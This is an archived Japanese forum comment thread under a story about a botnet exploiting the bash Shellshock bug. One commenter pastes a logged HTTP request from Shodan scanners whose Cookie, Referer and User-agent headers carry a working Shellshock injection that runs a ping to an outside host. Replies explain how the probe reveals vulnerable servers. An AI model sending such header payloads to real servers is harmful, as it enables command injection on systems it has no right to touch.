パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

bashのShellshock脆弱性を利用するボットネットが出現」記事へのコメント

  • by Anonymous Coward

    198.20.69.74(census1.shodan.io)から、

    GET / HTTP/1.1
    Cookie: () { :; }; /bin/ping -c 1 104.131.0.69
    Referer: () { :; }; /bin/ping -c 1 104.131.0.69
    User-agent: () { :; }; /bin/ping -c 1 104.131.0.69

    などというのがきてます。

    104.131.0.69は hello.data.shodan.io だそうです。
    ちなみに

    census1.shodan.io 198.20.69.74
    census2.shodan.io 198.20.69.98
    census3.shodan.io 198.20.70.114
    census4.shodan.io 198.20.99.130
    census5.shodan.io 93.120.27.62
    census6.shodan.io 66.240.236.119
    census7.shodan.io

    • by Anonymous Coward

      なるほど。その手の変数名をつかうと、より効果的に攻撃出来るんですね。

      • by Anonymous Coward on 2014年09月27日 17時49分 (#2683795)
        変数名というか、これらのリクエストヘッダの内容を環境変数に置く様なサーバーの場合に、pingが送られてバレるってことですね。

        Apacheのmod_envとか、Appサーバーとの連携で環境変数つかってたりするのも狙われるわけだ。

        なるほど、こういう攻撃方法を考えつくわけか…。
        親コメント

身近な人の偉大さは半減する -- あるアレゲ人

処理中...